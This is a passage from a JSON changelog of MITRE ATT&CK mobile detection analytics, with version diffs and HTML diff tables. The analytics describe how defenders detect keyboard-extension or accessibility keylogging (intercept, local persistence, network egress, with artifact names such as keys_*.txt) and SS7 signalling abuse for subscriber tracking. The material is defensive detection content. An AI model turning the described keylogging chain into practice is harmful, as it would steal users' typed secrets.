                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to154__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to154__0\"><a href=\"#difflib_chg_to154__top\">t</a></td><td class=\"diff_header\" id=\"from154_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;for&nbsp;applications&nbsp;reque</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to154__top\">t</a></td><td class=\"diff_header\" id=\"to154_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;app&nbsp;acquiring&nbsp;input-capture&nbsp;capabilit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sting&nbsp;the&nbsp;`android.permission.BIND_ACCESSIBILITY_SERVICE`&nbsp;pe</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;(AccessibilityService&nbsp;enablement&nbsp;or&nbsp;default&nbsp;IME&nbsp;set)&nbsp;with&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rmission&nbsp;in&nbsp;a&nbsp;service&nbsp;declaration.&nbsp;On&nbsp;Android,&nbsp;the&nbsp;user&nbsp;can&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">high-frequency&nbsp;text-change/IME&nbsp;commit&nbsp;callbacks&nbsp;sourced&nbsp;from</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">view&nbsp;and&nbsp;manage&nbsp;which&nbsp;applications&nbsp;can&nbsp;use&nbsp;accessibility&nbsp;ser</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;other&nbsp;packages,&nbsp;followed&nbsp;by&nbsp;local&nbsp;keylog&nbsp;persistence&nbsp;and/or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">vices&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;in&nbsp;Accessibility.&nbsp;The&nbsp;exac</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;small,&nbsp;immediate&nbsp;network&nbsp;egress.&nbsp;Chain:&nbsp;capability/permissi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">t&nbsp;device&nbsp;settings&nbsp;menu&nbsp;locations&nbsp;may&nbsp;vary&nbsp;between&nbsp;operating&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;\u2192&nbsp;intercept&nbsp;(accessibility&nbsp;\u2018TYPE_VIEW_TEXT_CHANGED\u2019&nbsp;or&nbsp;IM</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">system&nbsp;versions.&nbsp;On&nbsp;Android,&nbsp;the&nbsp;user&nbsp;can&nbsp;view&nbsp;and&nbsp;manage&nbsp;wh</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">E&nbsp;commitText/onStartInput&nbsp;bursts)&nbsp;\u2192&nbsp;persist&nbsp;to&nbsp;container&nbsp;\u2192&nbsp;n</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ich&nbsp;applications&nbsp;have&nbsp;third-party&nbsp;keyboard&nbsp;access&nbsp;through&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ear-term&nbsp;egress.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;device&nbsp;settings&nbsp;in&nbsp;System&nbsp;-&gt;&nbsp;Languages&nbsp;&amp;&nbsp;input&nbsp;-&gt;&nbsp;Virtual&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">keyboard.&nbsp;On&nbsp;iOS,&nbsp;the&nbsp;user&nbsp;can&nbsp;view&nbsp;and&nbsp;manage&nbsp;which&nbsp;applica</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tions&nbsp;have&nbsp;third-party&nbsp;keyboard&nbsp;access&nbsp;through&nbsp;the&nbsp;device&nbsp;se</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ttings&nbsp;in&nbsp;General&nbsp;-&gt;&nbsp;Keyboard.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--7f8717e8-fea8-42db-b60c-c64375630685",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 19:12:28.428000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0661#AN1752",
                            "external_id": "AN1752"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1752",
                    "description": "Defender correlates a custom keyboard extension activation (optionally with TCC \u2018Full Access\u2019) or abnormal UI text-entry interception with local keylog persistence and/or small egress. Chain: capability/consent (keyboard Full Access/TCC) \u2192 intercept (keyboard commit events or repeated secure text entry edits) \u2192 persist to container \u2192 near-term egress.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "iOS:unifiedlog",
                            "channel": "Keyboard extension Full Access change or related privacy grant for <bundle_id>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "Secure text entry focus and editingChanged bursts not typical for the app"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from intercept \u2192 persist/exfil (e.g., 5\u201360s)."
                        },
                        {
                            "field": "MinKeyEventBurst",
                            "description": "Minimum keyboard commit or editingChanged events (e.g., \u226510)."
                        },
                        {
                            "field": "KeyboardFullAccessRequired",
                            "description": "Require Full Access to elevate severity (true/false)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for keylog artifacts under container paths."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Allowlisted enterprise/analytics endpoints."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground state, Focus modes, MDM policy."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from intercept \\u2192 persist/exfil (e.g., 5\\u201360s).\"}, {\"field\": \"MinKeyEventBurst\", \"description\": \"Minimum keyboard commit or editingChanged events (e.g., \\u226510).\"}, {\"field\": \"KeyboardFullAccessRequired\", \"description\": \"Require Full Access to elevate severity (true/false).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for keylog artifacts under container paths.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Allowlisted enterprise/analytics endpoints.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground state, Focus modes, MDM policy.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 19:12:28.428000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates a custom keyboard extension activation (optionally with TCC \\u2018Full Access\\u2019) or abnormal UI text-entry interception with local keylog persistence and/or small egress. Chain: capability/consent (keyboard Full Access/TCC) \\u2192 intercept (keyboard commit events or repeated secure text entry edits) \\u2192 persist to container \\u2192 near-term egress.\", \"old_value\": \"Application vetting services can look for applications requesting the `android.permission.BIND_ACCESSIBILITY_SERVICE` permission in a service declaration. On Android, the user can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions.\\nOn Android, the user can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, the user can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services can look for applications requesting the `android.permission.BIND_ACCESSIBILITY_SERVICE` permission in a service declaration. On Android, the user can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions.\\n-On Android, the user can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, the user can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard. \\n+Defender correlates a custom keyboard extension activation (optionally with TCC \\u2018Full Access\\u2019) or abnormal UI text-entry interception with local keylog persistence and/or small egress. Chain: capability/consent (keyboard Full Access/TCC) \\u2192 intercept (keyboard commit events or repeated secure text entry edits) \\u2192 persist to container \\u2192 near-term egress.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Keyboard extension Full Access change or related privacy grant for <bundle_id>\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Secure text entry focus and editingChanged bursts not typical for the app\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to80__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to80__0\"><a href=\"#difflib_chg_to80__top\">t</a></td><td class=\"diff_header\" id=\"from80_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;for&nbsp;applications&nbsp;reque</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to80__top\">t</a></td><td class=\"diff_header\" id=\"to80_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;a&nbsp;custom&nbsp;keyboard&nbsp;extension&nbsp;activation&nbsp;(</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sting&nbsp;the&nbsp;`android.permission.BIND_ACCESSIBILITY_SERVICE`&nbsp;pe</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">optionally&nbsp;with&nbsp;TCC&nbsp;\u2018Full&nbsp;Access\u2019)&nbsp;or&nbsp;abnormal&nbsp;UI&nbsp;text-entry</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rmission&nbsp;in&nbsp;a&nbsp;service&nbsp;declaration.&nbsp;On&nbsp;Android,&nbsp;the&nbsp;user&nbsp;can&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;interception&nbsp;with&nbsp;local&nbsp;keylog&nbsp;persistence&nbsp;and/or&nbsp;small&nbsp;egr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">view&nbsp;and&nbsp;manage&nbsp;which&nbsp;applications&nbsp;can&nbsp;use&nbsp;accessibility&nbsp;ser</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ess.&nbsp;Chain:&nbsp;capability/consent&nbsp;(keyboard&nbsp;Full&nbsp;Access/TCC)&nbsp;\u2192&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">vices&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;in&nbsp;Accessibility.&nbsp;The&nbsp;exac</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">intercept&nbsp;(keyboard&nbsp;commit&nbsp;events&nbsp;or&nbsp;repeated&nbsp;secure&nbsp;text&nbsp;en</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">t&nbsp;device&nbsp;settings&nbsp;menu&nbsp;locations&nbsp;may&nbsp;vary&nbsp;between&nbsp;operating&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">try&nbsp;edits)&nbsp;\u2192&nbsp;persist&nbsp;to&nbsp;container&nbsp;\u2192&nbsp;near-term&nbsp;egress.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">system&nbsp;versions.&nbsp;On&nbsp;Android,&nbsp;the&nbsp;user&nbsp;can&nbsp;view&nbsp;and&nbsp;manage&nbsp;wh</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ich&nbsp;applications&nbsp;have&nbsp;third-party&nbsp;keyboard&nbsp;access&nbsp;through&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;device&nbsp;settings&nbsp;in&nbsp;System&nbsp;-&gt;&nbsp;Languages&nbsp;&amp;&nbsp;input&nbsp;-&gt;&nbsp;Virtual&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">keyboard.&nbsp;On&nbsp;iOS,&nbsp;the&nbsp;user&nbsp;can&nbsp;view&nbsp;and&nbsp;manage&nbsp;which&nbsp;applica</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tions&nbsp;have&nbsp;third-party&nbsp;keyboard&nbsp;access&nbsp;through&nbsp;the&nbsp;device&nbsp;se</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ttings&nbsp;in&nbsp;General&nbsp;-&gt;&nbsp;Keyboard.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--b2120e89-a453-4575-8458-7700ea59f85a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-24 17:54:57.531000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0662#AN1753",
                            "external_id": "AN1753"
                        },
                        {
                            "source_name": "CSRIC5-WG10-FinalReport",
                            "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.",
                            "url": "https://web.archive.org/web/20200330012714/https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1753",
                    "description": "Defender observes anomalous signaling network queries targeting subscriber information associated with a device, including unexpected routing requests, location information exchanges, or node-origin inconsistencies indicative of SS7 signaling abuse. (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "TelecomLogs:SS7Signaling",
                            "channel": "Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "TelecomLogs:MobilityEvents",
                            "channel": "Unexpected location resolution events or abnormal subscriber tracking requests"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "NodeIdentityDeviationThreshold",
                            "description": "Defines acceptable variance for signaling node identifiers"
                        },
                        {
                            "field": "SubscriberQueryFrequencyThreshold",
                            "description": "Baseline-dependent threshold for excessive subscriber queries"
                        },
                        {
                            "field": "GeographicRoutingDeviation",
                            "description": "Expected signaling path vs observed routing anomalies"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"NodeIdentityDeviationThreshold\", \"description\": \"Defines acceptable variance for signaling node identifiers\"}, {\"field\": \"SubscriberQueryFrequencyThreshold\", \"description\": \"Baseline-dependent threshold for excessive subscriber queries\"}, {\"field\": \"GeographicRoutingDeviation\", \"description\": \"Expected signaling path vs observed routing anomalies\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-24 17:54:57.531000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes anomalous signaling network queries targeting subscriber information associated with a device, including unexpected routing requests, location information exchanges, or node-origin inconsistencies indicative of SS7 signaling abuse. (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.\", \"old_value\": \"Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"TelecomLogs:SS7Signaling\", \"channel\": \"Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"TelecomLogs:MobilityEvents\", \"channel\": \"Unexpected location resolution events or abnormal subscriber tracking requests\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to186__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to186__0\"><a href=\"#difflib_chg_to186__top\">t</a></td><td class=\"diff_header\" id=\"from186_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Network&nbsp;carriers&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;use&nbsp;firewalls,&nbsp;Intrusion&nbsp;Det</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to186__top\">t</a></td><td class=\"diff_header\" id=\"to186_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;anomalous&nbsp;signaling&nbsp;network&nbsp;queries&nbsp;target</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ection&nbsp;Systems&nbsp;(IDS),&nbsp;or&nbsp;Intrusion&nbsp;Prevention&nbsp;Systems&nbsp;(IPS)&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing&nbsp;subscriber&nbsp;information&nbsp;associated&nbsp;with&nbsp;a&nbsp;device,&nbsp;includi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">to&nbsp;detect&nbsp;and/or&nbsp;block&nbsp;SS7&nbsp;exploitation.(Citation:&nbsp;CSRIC5-WG</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ng&nbsp;unexpected&nbsp;routing&nbsp;requests,&nbsp;location&nbsp;information&nbsp;exchang</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">10-FinalReport)&nbsp;The&nbsp;CSRIC&nbsp;also&nbsp;suggests&nbsp;threat&nbsp;information&nbsp;s</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">es,&nbsp;or&nbsp;node-origin&nbsp;inconsistencies&nbsp;indicative&nbsp;of&nbsp;SS7&nbsp;signali</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">haring&nbsp;between&nbsp;telecommunications&nbsp;industry&nbsp;members.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ng&nbsp;abuse.&nbsp;(Citation:&nbsp;CSRIC5-WG10-FinalReport)&nbsp;The&nbsp;CSRIC&nbsp;also</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;suggests&nbsp;threat&nbsp;information&nbsp;sharing&nbsp;between&nbsp;telecommunicati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ons&nbsp;industry&nbsp;members.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9bc8daed-e8ea-4c70-95bc-dcb2905b33d3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-24 17:56:26.375000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0662#AN1754",
                            "external_id": "AN1754"
                        },
                        {
                            "source_name": "CSRIC5-WG10-FinalReport",
                            "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.",
                            "url": "https://web.archive.org/web/20200330012714/https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1754",
                    "description": "Defender observes anomalous signaling interactions involving subscriber identity or location resolution events associated with a device, including abnormal routing requests, unexpected location information exchanges, or signaling node inconsistencies indicative of SS7 abuse. (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "TelecomLogs:SS7Signaling",
                            "channel": "Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "TelecomLogs:MobilityEvents",
                            "channel": "Unexpected subscriber tracking or abnormal mobility/location resolution activity"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "LocationQueryAnomalyThreshold",
                            "description": "Baseline deviation tolerance for location resolution events"
                        },
                        {
                            "field": "SignalingPathDeviationThreshold",
                            "description": "Expected vs observed signaling routing paths"
                        },
                        {
                            "field": "SubscriberResolutionFrequency",
                            "description": "Threshold for abnormal resolution or lookup behavior"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
